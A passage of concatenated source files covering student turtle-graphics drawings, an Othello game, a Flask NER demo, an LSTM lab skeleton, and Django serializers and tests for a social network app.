yu.fd(25)
yu.right(90)
yu.fd(200)
yu.left(90)
yu.fd(75)
yu.pendown()
def door(rt):
"""makes a door"""
rt.color("red")
rt.begin_fill()
rt.fd(50)
rt.left(90)
rt.fd(70)
rt.left(90)
rt.fd(50)
rt.left(90)
rt.fd(70)
rt.end_fill()
rt.color("blue")
rt.penup()
rt.backward(25)
rt.left(90)
rt.fd(10)
rt.pendown()
rt.begin_fill()
rt.circle(5)
rt.end_fill()
rt.penup()
rt.backward(10)
rt.right(90)
rt.fd(25)
rt.left(90)
rt.pendown()
def repos(er):
"""repositions the turtle again for the roof"""
er.penup()
er.backward(260)
er.left(90)
er.fd(100)
er.right(90)
er.fd(25)
er.pendown()
def repo(op):
"""makes the turtle go in position to make windows"""
op.left(90)
op.fd(100)
op.right(90)
def roof(ro):
"""makes a roof"""
ro.color("blue")
ro.begin_fill()
ro.backward(50)
ro.left(60)
ro.fd(250)
ro.right(120)
ro.fd(250)
ro.left(60)
ro.backward(250)
ro.end_fill()
def reposition(qw):
"""repositions the turtle on the bottom left of the screen"""
qw.penup()
qw.right(135)
qw.fd(350)
qw.right(-135)
qw.pendown()
def house(wt):
"""Makes the frame of the house"""
wt.color("black")
wt.begin_fill()
wt.fd(200)
wt.left(90)
wt.fd(200)
wt.left(90)
wt.fd(200)
wt.left(90)
wt.fd(200)
wt.left(90)
wt.end_fill()
def windows(nt):
"""This makes windows """
nt.color("yellow")
nt.begin_fill()
nt.fd(70)
nt.left(90)
nt.fd(70)
nt.left(90)
nt.fd(70)
nt.left(90)
nt.fd(70)
nt.end_fill()
nt.left(180)
nt.fd(35)
nt.right(90)
nt.color("black")
nt.fd(70)
nt.backward(35)
nt.left(90)
nt.fd(35)
nt.backward(70)
nt.right(90)
nt.penup()
nt.backward(35)
nt.fd(130)
nt.pendown()
def main():
roe = turtle.Turtle()
roe.speed(0)
wn = turtle.Screen()
wn.bgcolor("#738678")
roe.pensize(2)
reposition(roe)
house(roe)
repo(roe)
for i in range(2):
windows(roe)
repos(roe)
roof(roe)
reposs(roe)
door(roe)
reposss(roe)
chimmeny(roe)
for i in range(5):
smoke(roe)
roe.left(-180)
for i in range(5):
roe.penup()
smoke(roe)
roe.pendown()
rep(roe)
for i in range(7):
smokey(roe)
wn.exitonclick()
main()
# turtle.color ("#738678") #this code makes a circle the color xanadu
# turtle.begin_fill()
# turtle.circle(60)
# turtle.end_fill()
```
#### File: 2020-Spring-CSC-226/a03-master/a03_redmonl.py
```python
import turtle
wn = turtle.Screen() # creates the screen
wn.bgcolor('pink')
bud = turtle.Turtle() # creates the first turtle
bud.hideturtle()
petal = turtle.Turtle() # creates the second turtle
petal.hideturtle()
petal.up()
petal.goto(17,25) # puts the second turtle into position
bud.fillcolor('yellow') # creates the center of the flower
bud.begin_fill()
bud.circle(20)
bud.end_fill()
def draw_petal(): # the parameters for the petal
petal.fillcolor('#CC0000')
petal.begin_fill()
petal.circle(100,70)
petal.left(110)
petal.circle(100,70)
petal.end_fill()
def main(): # draws the flower
draw_petal()
petal.goto(8,2)
draw_petal()
petal.goto(-20,20)
draw_petal()
petal.goto(17,30)
draw_petal()
petal.goto(10,4)
draw_petal()
petal.goto(-20,18)
draw_petal()
petal.goto(0,40)
draw_petal()
petal.goto(17,10)
draw_petal()
petal.goto(-10,5)
draw_petal()
petal.goto(-10,35)
draw_petal()
petal.goto(17,12)
draw_petal()
petal.goto(0,0)
draw_petal()
petal.goto(-17,30)
draw_petal()
main()
wn.mainloop()
```
#### File: 2020-Spring-CSC-226/a03-master/a03_roshan.py
```python
import turtle
house = turtle.Turtle()
def make_triangle():
"""
makes a triangle on top of the main houses
"""
house.right(135)
house.forward(200)
house.right(113)
house.forward(163)
house.penup()
house.right(24)
house.forward(195)
house.right(90)
house.forward(100)
def make_square():
"""
makes the square
:return:
"""
house.penup()
house.left(180)
house.forward(200)
house.left(90)
house.pendown()
house.forward(200)
house.left(90)
house.forward(200)
house.left(90)
house.forward(200)
house.left(90)
house.forward(200)
def make_door():
"""
makes the door of the house
"""
house.pendown()
house.right(90)
house.forward(45)
house.left(90)
house.forward(25)
house.left(90)
house.forward(45)
def main():
"""
bringing all the sections together to make the house
"""
wn = turtle.Screen()
wn.bgcolor("#FF0000") #hexcode for red
wn.title("house")
make_square()
make_triangle()
make_door()
wn.exitonclick()
main()
```
#### File: 2020-Spring-CSC-226/a03-master/Jarju_a03.py
```python
import turtle # Imports turtle from the python Library
def draw_base(cup):
"""
draws the base of a cup
:param cup: a Turtle object
:return: None (void function)
"""
cup.hideturtle()
cup.color('#61d4b3')
cup.pensize(10)
cup.begin_fill()
for i in range(4):
cup.forward(45)
cup.right(90)
cup.penup()
cup.forward(45)
cup.right(90)
cup.forward(20)
cup.circle(15)
cup.end_fill()
def curve(love):
"""
draws the love sign on the table
:param love: a Turtle object
:return: None (void function)
"""
love.hideturtle()
love.begin_fill()
love.setpos(0, 10)
for i in range(50): # Setting up a loop
love.right(1)
love.forward(1)
love.speed(0)
love.color('#c81912') # First color is the border color and second color is the fill color.
love.begin_fill()
love.left(140) # Turns the turtle left at an angle of 140 degrees.
love.forward(95)
love.color('#c81912')
love.end_fill()
def draws_table(table):
"""""
draws a table
:param table: a Turtle object
:return: None (void function)
"""
table.hideturtle()
table.pensize(18)
table.penup()
table.setpos(-45, -59)
table.pendown()
table.begin_fill()
table.color('#00ff22')
table.forward(100)
table.right(45)
table.forward(100)
table.right(125)
table.forward(30)
table.right(45)
table.forward(65)
table.left(35)
table.forward(125)
table.left(53)
table.forward(62)
table.right(90)
table.forward(30)
table.right(94)
table.forward(98)
table.right(55)
table.forward(50)
table.end_fill()
def make_text(txt):
"""
Writes text to the screen.
:param txt: a Turtle object
:return: None
"""
txt.hideturtle()
txt.penup()
txt.color("#ffcc00")
txt.setpos(0, 120)
txt.write('Computer Science Is Life!', move=False, align='center', font=("Algerian", 20, ("bold", "normal")))
def main():
wn = turtle.Screen()
wn.bgcolor('#ffffff') # Sets background color.
cup = turtle.Turtle()
table = turtle.Turtle()
love = turtle.Turtle()
txt = turtle.Turtle()
# Call Functions
draw_base(cup)
draws_table(table)
make_text(txt)
curve(love)
wn.exitonclick()
main() #call main()
```
#### File: 2020-Spring-CSC-226/a03-master/reevesv2.py
```python
import turtle
def house(ab):
"""
Draws the filled rectangular body of the house.
"""
ab.begin_fill()
for i in range(2):
ab.forward(500)
ab.left(90)
ab.forward(250)
ab.left(90)
ab.end_fill()
# ....
def outlinehouse(ab):
"""
Draws the outline of the house body.
"""
for i in range(2):
ab.forward(500)
ab.left(90)
ab.forward(250)
ab.left(90)
def roof(cd):
"""
this function draws the wicked cool roof
"""
cd.begin_fill()
cd.forward(600)
cd.left(150)
cd.forward(500)
cd.left(120)
cd.forward(200)
cd.right(90)
cd.forward(167)
cd.left(90)
cd.forward(50)
cd.end_fill()
# ...
def outlineroof(cd):
"""
this function draws the wicked cool roof
"""
cd.forward(600)
cd.left(150)
cd.forward(500)
cd.left(120)
cd.forward(200)
cd.right(90)
cd.forward(167)
cd.left(90)
cd.forward(50)
# ...
def pole(ef):
"""
draw the pole for the flag
"""
ef.begin_fill()
ef.left(90)
for i in range(2):
ef.forward(10)
ef.left(90)
ef.forward(350)
ef.left(90)
ef.end_fill()
#.....
def flag(gh):
"""
this function draws the flag
"""
gh.begin_fill()
for i in range(2):
gh.forward(90)
gh.left(90)
gh.forward(60)
gh.left(90)
gh.end_fill()
#....
def cross(ij):
"""
this function draws the white cross on the swiss flag
"""
ij.begin_fill()
for i in range(4):
ij.left(90)
ij.forward(25)
ij.left(90)
ij.forward(5)
ij.left(90)
ij.forward(25)
ij.end_fill()
#end of function
def door (kl):
"""
this function draws the door the the door knob
"""
kl.begin_fill()
for i in range(2):
kl.forward(60)
kl.left(90)
kl.forward(150)
kl.left(90)
kl.end_fill()
#end of door function
def knob(mn):
"""
this function draws the door knob
"""
mn.begin_fill()
for i in range(15):
mn.forward(2)
mn.left(24)
mn.end_fill()
#end of knob function
def window(op):
"""
this function draws the door knob
"""
op.begin_fill()
for i in range(2):
op.forward(89)
op.left(90)
op.forward(59)
op.left(90)
op.end_fill()
#end of knob function
def bars(ij):
"""
this function draws the bars across the window
"""
ij.begin_fill()
for i in range(2):
ij.left(90)
ij.forward(32)
ij.left(90)
ij.forward(5)
ij.left(90)
ij.forward(32)
ij.left(90)
ij.forward(47)
ij.left(90)
ij.forward(5)
ij.left(90)
ij.forward(47)
ij.end_fill()
ij.right(90)
ij.forward(30)
ij.left(90)
ij.forward(44)
ij.left(90)
ij.forward(64)
ij.left(90)
ij.forward(94)
ij.left(90)
ij.forward(64)
ij.left(90)
ij.forward(49)
#end of function
def rail(kl):
"""
this function draws the bars across the window
"""
for i in range(2):
kl.begin_fill()
kl.forward(3)
kl.left(90)
kl.forward(100)
kl.left(90)
kl.end_fill()
#end of function
def toprail(mn):
for i in range(2):
mn.begin_fill()
mn.forward(164)
mn.left(90)
mn.forward(6)
mn.left(90)
mn.end_fill()
#end of function
def main():
"""
Draws the dorm scene by composing the house, roof, flag, door, window, and rail functions.
"""
# ...
wn = turtle.Screen() # Set up the window and its attributes
wn.bgcolor("green")
wn.title("My Beautiful Dorm")
reeves = turtle.Turtle()
reeves.speed(0)
reeves.pensize(3)
reeves.penup()
reeves.setpos(-250, -300)
reeves.pendown()
reeves.color("brown")
reeves.pensize(3)
house(reeves)
reeves.color("black")
reeves.penup()
reeves.setpos(-300, -50)
reeves.pendown()
reeves.color("Blue")
roof(reeves)
reeves.color("black")
reeves.penup()
reeves.setpos(-210, 2)
reeves.pendown()
reeves.color("black")
pole(reeves)
reeves.penup()
reeves.setpos(-200, 270)
reeves.pendown()
reeves.color("red")
flag(reeves)
reeves.penup()
reeves.setpos(-150, 300)
reeves.pendown()
reeves.color("white")
cross(reeves)
reeves.penup()
reeves.setpos(-80, -300)
reeves.pendown()
reeves.color("black")
door(reeves)
reeves.penup()
reeves.setpos(-75, -240)
reeves.pendown()
reeves.color("blue")
knob(reeves)
# Below is the top left window
reeves.penup()
reeves.setpos(-199, -150)
reeves.pendown()
reeves.color("yellow")
window(reeves)
reeves.penup()
reeves.setpos(-151, -123)
reeves.pendown()
reeves.color("black")
bars(reeves)
# Below is the bottom left window
reeves.penup()
reeves.setpos(-199, -245)
reeves.pendown()
reeves.color("yellow")
window(reeves)
reeves.penup()
reeves.setpos(-151, -218)
reeves.pendown()
reeves.color("black")
bars(reeves)
# Below is the middle bottom window
reeves.penup()
reeves.setpos(0, -245)
reeves.pendown()
reeves.color("yellow")
window(reeves)
reeves.penup()
reeves.setpos(48, -218)
reeves.pendown()
reeves.color("black")
bars(reeves)
# Below is the middle top window
reeves.penup()
reeves.setpos(0, -150)
reeves.pendown()
reeves.color("yellow")
window(reeves)
reeves.penup()
reeves.setpos(48, -123)
reeves.pendown()
reeves.color("black")
bars(reeves)
# Below is the right top window
reeves.penup()
reeves.setpos(120, -150)
reeves.pendown()
reeves.color("yellow")
window(reeves)
reeves.penup()
reeves.setpos(168, -123)
reeves.pendown()
reeves.color("black")
bars(reeves)
# Below is the right bottom window
reeves.penup()
reeves.setpos(120, -245)
reeves.pendown()
reeves.color("yellow")
window(reeves)
reeves.penup()
reeves.setpos(168, -218)
reeves.pendown()
reeves.color("black")
bars(reeves)
#Outline the house and the roof
reeves.pensize(3)
reeves.penup()
reeves.setpos(-250, -300)
reeves.pendown()
reeves.color("black")
outlinehouse(reeves)
reeves.penup()
reeves.setpos(-300, -50)
reeves.pendown()
reeves.color("black")
outlineroof(reeves)
#Start drawing rail
reeves.penup()
reeves.setpos(-290, 2)
reeves.pendown()
reeves.color("white")
reeves.left(90)
rail(reeves)
reeves.penup()
reeves.setpos(-270, 2)
reeves.pendown()
reeves.color("white")
rail(reeves)
reeves.penup()
reeves.setpos(-250, 2)
reeves.pendown()
reeves.color("white")
rail(reeves)
reeves.penup()
reeves.setpos(-230, 2)
reeves.pendown()
reeves.color("white")
rail(reeves)
reeves.penup()
reeves.setpos(-210, 2)
reeves.pendown()
reeves.color("white")
rail(reeves)
reeves.penup()
reeves.setpos(-190, 2)
reeves.pendown()
reeves.color("white")
rail(reeves)
reeves.penup()
reeves.setpos(-170, 2)
reeves.pendown()
reeves.color("white")
rail(reeves)
reeves.penup()
reeves.setpos(-150, 2)
reeves.pendown()
reeves.color("white")
rail(reeves)
reeves.penup()
reeves.setpos(-300, 80)
reeves.pendown()
toprail(reeves)
reeves.penup()
reeves.setpos(-1000, -1000)
reeves.pendown()
wn.exitonclick()
main()
``` |
{
"source": "2021AIT-OOP2-G06/oop2-othello",
"score": 3
} |
#### File: 2021AIT-OOP2-G06/oop2-othello/othello.py
```python
grid = [
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 2, 0, 0, 0],
[0, 0, 0, 2, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]
]
def selectCell(row,col,player):
# Check whether this move can flip any stones; if not, place nothing and return
check = Check(col,row,player)
if(check):
return "NG"
if ((player==1) and (grid[row][col]==0)):
grid[row][col] = 1
#isValid(row, col,player)
Overturn(col,row,player)
#print(grid)
#return "OK"
elif((player==2) and (grid[row][col]==0)):
grid[row][col] = 2
Overturn(col,row,player)
#isValid(row, col,player)
#print(grid)
#return "OK"
#else:
#return "ok"
if player == 1:
yer = 2
else :
yer = 1
pas = Put(yer)
if(pas):
return "PASS"
else :
return "OK"
# The action of flipping stones
def Overturn(x,y,player):
# Get the coordinates of stones that can be flipped
#self.Reverce(x, y)
overturn_x = []
overturn_y = []
kensa = [-1, 0, 1]
# Get the coordinates of flippable stones in the vertical, horizontal and diagonal directions from the placed square
# The coordinates found are stored in overturn_x and overturn_y
for xx in kensa:
for yy in kensa:
# Skip the case where xx and yy point at the placed stone itself
if xx == 0 and yy == 0:
continue
tmpx = []
tmpy = []
takasa = 0
# Scan the stones along this direction
while(True):
takasa += 1
# Walk outward along the x and y coordinates looking for stones
tyokusen_x = x + (xx * takasa)
tyokusen_y = y + (yy * takasa)
# Check whether there is a stone at this position and whether it can be flipped
if 0 <= tyokusen_x < 8 and 0 <= tyokusen_y < 8:
osero = grid[int(tyokusen_y)][int(tyokusen_x)]
# When one of the player's own stones is found
if osero == player:
if tmpx != [] and tmpy != []:
# print("追加しました")
overturn_x.append(tmpx)
overturn_y.append(tmpy)
break
else:
break
# When an opponent's stone is found
elif osero != player:
if osero == 0:
break
else:
tmpx.append(tyokusen_x)
tmpy.append(tyokusen_y)
else:
break
# Store the x and y coordinates
xx = overturn_x
yy = overturn_y
# Flip the stones
for i in range(len(overturn_y)):
for j in range(len(overturn_y[i])):
# print(self.overturn_x[i][j])
# print(self.overturn_y[i][j])
grid[yy[i][j]][xx[i][j]] = player
print(overturn_x)
print(overturn_y)
# Switch players
#if player == 1:
#player = 2
#else:
#player = 1
def Check( x, y, player):
# When a stone has already been placed here
if grid[y][x] != 0:
#print("ここには置けません")
return True
overturn_x = []
overturn_y = []
kensa = [-1, 0, 1]
# Get the coordinates of flippable stones in the vertical, horizontal and diagonal directions from the placed square
# The coordinates found are stored in overturn_x and overturn_y
for xx in kensa:
for yy in kensa:
# Skip the case where xx and yy point at the placed stone itself
if xx == 0 and yy == 0:
continue
tmpx = []
tmpy = []
takasa = 0
# Scan the stones along this direction
while(True):
takasa += 1
# Walk outward along the x and y coordinates looking for stones
tyokusen_x = x + (xx * takasa)
tyokusen_y = y + (yy * takasa)
# Check whether there is a stone at this position and whether it can be flipped
if 0 <= tyokusen_x < 8 and 0 <= tyokusen_y < 8:
osero = grid[int(tyokusen_y)][int(tyokusen_x)]
# When one of the player's own stones is found
if osero == player:
if tmpx != [] and tmpy != []:
# print("追加しました")
overturn_x.append(tmpx)
overturn_y.append(tmpy)
break
else:
break
# When an opponent's stone is found
elif osero != player:
if osero == 0:
break
else:
tmpx.append(tyokusen_x)
tmpy.append(tyokusen_y)
else:
break
# Whether placing at the given coordinates would flip any stones
for i in range(len(overturn_x)):
if overturn_x[i] != 0:
#print("ここにおけます")
#grid[y][x] = player
return False
#print("ここに置けません")
return True
def Put(player):
put_x = []
put_y = []
for x in range(8):
for y in range(8):
# If the square already holds a stone
# print(self.list[x][y])
if grid[int(y)][int(x)] != 0:
continue
# Find the stones that could be flipped by placing at this coordinate
# print(x,y)
#self.Reverce(x, y)
overturn_x = []
overturn_y = []
kensa = [-1, 0, 1]
# Get the coordinates of flippable stones in the vertical, horizontal and diagonal directions from the placed square
# The coordinates found are stored in overturn_x and overturn_y
for xx in kensa:
for yy in kensa:
# Skip the case where xx and yy point at the placed stone itself
if xx == 0 and yy == 0:
continue
tmpx = []
tmpy = []
takasa = 0
# Scan the stones along this direction
while(True):
takasa += 1
# Walk outward along the x and y coordinates looking for stones
tyokusen_x = x + (xx * takasa)
tyokusen_y = y + (yy * takasa)
# Check whether there is a stone at this position and whether it can be flipped
if 0 <= tyokusen_x < 8 and 0 <= tyokusen_y < 8:
osero = grid[int(tyokusen_y)][int(tyokusen_x)]
# When one of the player's own stones is found
if osero == player:
if tmpx != [] and tmpy != []:
# print("追加しました")
overturn_x.append(tmpx)
overturn_y.append(tmpy)
break
else:
break
# When an opponent's stone is found
elif osero != player:
if osero == 0:
break
else:
tmpx.append(tyokusen_x)
tmpy.append(tyokusen_y)
else:
break
if overturn_x == [] and overturn_y == []:
continue
else:
put_x.append(x)
put_y.append(y)
if put_x == []:
return True
else :
return False
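# A minimal sketch (an illustrative assumption, not part of the original game code):
# the direction scan duplicated in Overturn(), Check() and Put() can be written once
# as a helper that returns every coordinate flipped by `player` placing at (x, y).
def flippable_from(x, y, player):
    flips = []
    for dx in (-1, 0, 1):
        for dy in (-1, 0, 1):
            if dx == 0 and dy == 0:
                continue
            line = []
            step = 1
            while True:
                nx, ny = x + dx * step, y + dy * step
                if not (0 <= nx < 8 and 0 <= ny < 8):
                    break
                cell = grid[ny][nx]
                if cell == 0:
                    # Empty square: nothing is enclosed in this direction.
                    break
                if cell == player:
                    # Own stone closes the line; everything in between flips.
                    flips.extend(line)
                    break
                line.append((nx, ny))
                step += 1
    return flips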
``` |
{
"source": "2021-asr-internship-ysy/pytorch-bert-crf-ner",
"score": 2
} |
#### File: 2021-asr-internship-ysy/pytorch-bert-crf-ner/app.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
from flask import Flask, render_template, request
from inference import DecoderFromNamedEntitySequence
import json
import pickle
import torch
from gluonnlp.data import SentencepieceTokenizer
from model.net import KobertCRFViz
from data_utils.utils import Config
from data_utils.vocab_tokenizer import Tokenizer
from data_utils.pad_sequence import keras_pad_fn
from pathlib import Path
app = Flask(__name__)
@app.route('/')
def hello_world():
return 'Hello World!'
@app.route('/test')
def test():
return render_template('post.html')
@app.route('/post', methods=['POST'])
def post():
value = request.form['input']
model_dir = Path('./experiments/base_model_with_crf')
model_config = Config(json_path=model_dir / 'config.json')
# load vocab & tokenizer
tok_path = "ptr_lm_model/tokenizer_78b3253a26.model"
ptr_tokenizer = SentencepieceTokenizer(tok_path)
with open(model_dir / "vocab.pkl", 'rb') as f:
vocab = pickle.load(f)
tokenizer = Tokenizer(vocab=vocab, split_fn=ptr_tokenizer, pad_fn=keras_pad_fn, maxlen=model_config.maxlen)
# load ner_to_index.json
with open(model_dir / "ner_to_index.json", 'rb') as f:
ner_to_index = json.load(f)
index_to_ner = {v: k for k, v in ner_to_index.items()}
# model
model = KobertCRFViz(config=model_config, num_classes=len(ner_to_index), vocab=vocab)
# load
model_dict = model.state_dict()
checkpoint = torch.load("./experiments/base_model_with_crf/best-epoch-16-step-1500-acc-0.993.bin",
map_location=torch.device('cpu'))
convert_keys = {}
for k, v in checkpoint['model_state_dict'].items():
new_key_name = k.replace("module.", '')
if new_key_name not in model_dict:
print("{} is not int model_dict".format(new_key_name))
continue
convert_keys[new_key_name] = v
model.load_state_dict(convert_keys, strict=False)
model.eval()
device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
model.to(device)
decoder_from_res = DecoderFromNamedEntitySequence(tokenizer=tokenizer, index_to_ner=index_to_ner)
input_text = value
list_of_input_ids = tokenizer.list_of_string_to_list_of_cls_sep_token_ids([input_text])
x_input = torch.tensor(list_of_input_ids).long()
list_of_pred_ids, _ = model(x_input)
list_of_ner_word, decoding_ner_sentence = decoder_from_res(list_of_input_ids=list_of_input_ids,
list_of_pred_ids=list_of_pred_ids)
return {'word': list_of_ner_word, 'decoding': decoding_ner_sentence}
if __name__ == '__main__':
# app.debug = True
app.run(host='0.0.0.0')
``` |
{
"source": "2021-DGSW-Ensemble/Ensemble-AI",
"score": 2
} |
#### File: test/evaluation/local.py
```python
import importlib
import os
class EnvSettings:
def __init__(self):
test_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
self.results_path = '{}/tracking_results/'.format(test_path)
self.segmentation_path = '{}/segmentation_results/'.format(test_path)
self.network_path = '{}/networks/'.format(test_path)
self.result_plot_path = '{}/result_plots/'.format(test_path)
self.otb_path = ''
self.nfs_path = ''
self.uav_path = ''
self.tpl_path = ''
self.vot_path = ''
self.got10k_path = ''
self.lasot_path = ''
self.trackingnet_path = ''
self.davis_dir = ''
self.youtubevos_dir = ''
self.got_packed_results_path = ''
self.got_reports_path = ''
self.tn_packed_results_path = ''
def local_env_settings():
settings = EnvSettings()
# Set your local paths here.
settings.davis_dir = ''
settings.got10k_path = ''
settings.got_packed_results_path = ''
settings.got_reports_path = ''
settings.lasot_path = ''
settings.network_path = '../networks/' # Where tracking networks are stored.
settings.nfs_path = ''
settings.otb_path = ''
settings.prj_dir = ''
settings.save_dir = ''
settings.result_plot_path = '../result_plots/'
settings.results_path = '../tracking_results/' # Where to store tracking results
settings.segmentation_path = '../segmentation_results/'
settings.tn_packed_results_path = ''
settings.tpl_path = ''
settings.trackingnet_path = ''
settings.uav_path = ''
settings.vot_path = ''
settings.youtubevos_dir = ''
return settings
``` |
{
"source": "2021-DL-Training-Program/Lab3-Image-Caption",
"score": 3
} |
#### File: 2021-DL-Training-Program/Lab3-Image-Caption/DIY_LSTM.py
```python
import math
import torch
import warnings
import itertools
import numbers
from torch.nn.modules.module import Module
from torch.nn.parameter import Parameter
from torch.nn.utils.rnn import PackedSequence
from torch.nn import init
import torch.nn as nn
class my_LSTM(nn.Module):
def __init__(self, input_size, hidden_size, num_layers, if_bias=True, batch_first=False):
super(my_LSTM, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.if_bias = if_bias
self.batch_first = batch_first
'''
TO-DO: define each matrix multiplication here
'''
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
self.reset_parameters()
def reset_parameters(self):
stdv = 1.0 / math.sqrt(self.hidden_size)
for weight in self.parameters():
init.uniform_(weight, -stdv, stdv)
def forward(self, input_seq, hx=None):
'''
TO-DO: check if input_seq is a packed sequence. If yes, unpack it.
'''
# outputs
hidden_state_list = []
cell_state_list = []
'''
TO-DO: if hx is None, initialize it.
'''
if hx is None:
pass
else:
pass
'''
TO-DO: implement LSTM here
'''
hidden_state_list = torch.cat(hidden_state_list, 0)
cell_state_list = torch.cat(cell_state_list, 0)
return hidden_state_list, (hidden_state_list, cell_state_list)
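# A minimal sketch (an illustrative assumption, not the intended lab solution) of the
# computation one LSTM time step performs, which the TO-DO blocks above ask for.
# Weight shapes follow the PyTorch convention: W_ih is (4*hidden, input),
# W_hh is (4*hidden, hidden), and the gate order is input, forget, cell, output.
def lstm_cell_step(x_t, h_prev, c_prev, W_ih, W_hh, b_ih, b_hh):
    # Compute all four gate pre-activations with one affine map, then split them.
    gates = x_t @ W_ih.t() + b_ih + h_prev @ W_hh.t() + b_hh
    i, f, g, o = gates.chunk(4, dim=1)
    i, f, o = torch.sigmoid(i), torch.sigmoid(f), torch.sigmoid(o)
    g = torch.tanh(g)
    c_t = f * c_prev + i * g           # new cell state
    h_t = o * torch.tanh(c_t)          # new hidden state
    return h_t, c_t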
``` |
{
"source": "2021fallCMPUT404/group-cmput404-project",
"score": 2
} |
#### File: mysite/posts/serializers.py
```python
from django.db.models.fields import SlugField
from rest_framework import serializers
from .models import Post, Comment, Like, CommentLike, Node#, InboxLike
from users.serializers import User_Profile, userPSerializer, UserSerializer, InboxSerializer
class PostSerializer(serializers.ModelSerializer):
#author = serializers.StringRelatedField(source = 'author.username')
#shared_user = serializers.StringRelatedField(source = 'shared_user.username', many=True)
#author = userPSerializer(many=False, read_only=True)
author = UserSerializer(read_only=True)
class Meta:
model = Post
fields = ('type', 'id', 'title', 'text', 'image', 'pub_date', 'author',
'shared_user', 'shared_on', 'privacy', 'contentType')
'''
def create(self, validated_data):
return Post.objects.create(**validated_data)
def update(self, instance, validated_data):
instance.id = validated_data.get('id', instance.id)
instance.title = validated_data.get('title', instance.title)
instance.text = validated_data.get('text', instance.text)
instance.image = validated_data.get('image', instance.image)
instance.pub_date = validated_data.get('pub_date', instance.pub_date)
instance.author = validated_data.get('author', instance.author)
instance.shared_user = validated_data.get('shared_user',
instance.shared_user)
instance.shared_on = validated_data.get('shared_on',
instance.shared_on)
instance.privacy = validated_data.get('privacy', instance.privacy)
instance.contentType = validated_data.get('contentType',
instance.contentType)
instance.save()
return instance
'''
'''
def validate(self, data):
if data['author'] == None:
raise serializers.ValidationError("No such author")
return data
'''
class LikeSerializer(serializers.ModelSerializer):
user = UserSerializer(many=False, read_only=True)
class Meta:
model = Like
fields = ('type', 'user', 'object')
class CommentSerializer(serializers.ModelSerializer):
author = userPSerializer(many=False, read_only=True)
like = LikeSerializer(many=True, read_only=True)
class Meta:
model = Comment
fields = ('type', 'author', 'post', 'comment_body', 'comment_created',
'like', 'id')
class LikeCommentSerializer(serializers.ModelSerializer):
user = UserSerializer()
class Meta:
model = CommentLike
fields = ('user', 'comment')
class NodeSerializer(serializers.ModelSerializer):
class Meta:
model = Node
fields = ['url', 'username','password']
'''
class InboxLikeSerializer(serializers.ModelSerializer):
class Meta:
model = InboxLike
fields = "__all__"
'''
```
#### File: group-cmput404-project/mysite/test_post_model.py
```python
from django.test import TestCase
from requests.sessions import TooManyRedirects
from test_users_model_form import *
from posts.models import Post, Comment
from users.serializers import UserSerializer
class test_post(TestCase):
def setUp(self):
user1 = User.objects.create(username='testcase',
first_name='test',
last_name='case',
email='<EMAIL>',
password='<PASSWORD>')
User_Profile.objects.create(
displayName='case_1',
user=user1,
first_name='test',
last_name='case',
email='<EMAIL>',
profileImage='test_image.jpg',
github='JohnChen97',
bio='test_bio1')
test_user_1 = User.objects.get(username="testcase")
test_profile_1 = User_Profile.objects.get(user=test_user_1)
Post.objects.create(
#type = 'post',
text = 'trial',
image='test_image.jpg',
author=test_user_1,
shared_user = None,
shared_on = None)
test_post_1 = Post.objects.get(author = test_user_1)
user_serializer = UserSerializer(user1)
user_data = user_serializer.data
Comment.objects.create(post = test_post_1, author = user_data, comment_body = 'test_comment_body')
def test_post_cases(self):
test_user_1 = User.objects.get(username = "testcase")
test_profile_1 = User_Profile.objects.get(user = test_user_1)
test_ps = Post.objects.get(author=test_user_1)
self.assertEqual(test_ps.text, 'trial')
self.assertEqual(test_ps.image, 'test_image.jpg')
def test_comment(self):
test_user_1 = User.objects.get(username = "testcase")
test_profile_1 = User_Profile.objects.get(user = test_user_1)
test_ps = Post.objects.get(author=test_user_1)
test_comment = Comment.objects.get(post = test_ps)
self.assertEqual(test_comment.comment_body, 'test_comment_body')
```
#### File: mysite/users/serializers.py
```python
from rest_framework import *
from rest_framework import serializers
from rest_framework.serializers import *
from .models import FriendRequest, User, User_Profile, UserFollows, Inbox
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ['username', 'email', 'first_name', 'last_name']
#fields = '__all__'
def to_representation(self, instance):
ret = super().to_representation(instance)
user_profile = User_Profile.objects.get(user=instance)
user_profile = userPSerializer(user_profile)
print(user_profile.data)
ret.update(user_profile.data)
#ret['profileImage'] = user_profile.data
ret['url'] = "https://cmput404-socialdist-project.herokuapp.com/author/{}".format(str(instance.id))
ret['host'] = 'https://cmput404-socialdist-project.herokuapp.com/'
return ret
'''
def validate(self, data):
if not User.objects.get(data['author']).exists:
raise serializers.ValidationError("The author is None")
return data
'''
#User profile serializer
#TODO: Maybe add a full user profile serialzier that includes all fields
class userPSerializer(serializers.ModelSerializer):
#This puts in the type attribute since __all__ is not grabbing User_Profile.type attribute for some reason
#Reference: https://stackoverflow.com/a/60891077
id = SerializerMethodField('set_id')
class Meta:
model = User_Profile
fields = [
'type', 'id', 'url', 'host', 'displayName', 'github', 'bio',
'profileImage', 'user'
] #TODO: ADD URL AND HOST
read_only_fields = ['type','user']
def set_id(self, obj):
return '{}author/{}'.format(obj.host, obj.id)
class userFollowSerializer(serializers.ModelSerializer):
class Meta:
model = UserFollows
fields = '__all__'
class friend_request_serializer(serializers.ModelSerializer):
type = 'Follow'
actor = userPSerializer(many=False, read_only=True)
object = userPSerializer(many=False, read_only=True)
summary = "{} wants to follow {}".format(actor.data['displayName'],
object.data['displayName'])
class Meta:
model = FriendRequest
fields = [
'type',
'summary',
'actor',
'object',
]
class InboxSerializer(serializers.ModelSerializer):
user = UserSerializer(many=False, read_only=True)
class Meta:
model = Inbox
fields = ['type', 'author']
```
#### File: mysite/users/views.py
```python
from django.http.response import JsonResponse
from django.shortcuts import render, get_object_or_404
from . import views
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.urls import reverse
from .models import User, Create_user, User_Profile, FriendRequest, UserFollows, Inbox
from posts.views import * #Will change this later on
from posts.serializers import * #Also will change this too
from django.apps import apps
from . import create_user_form
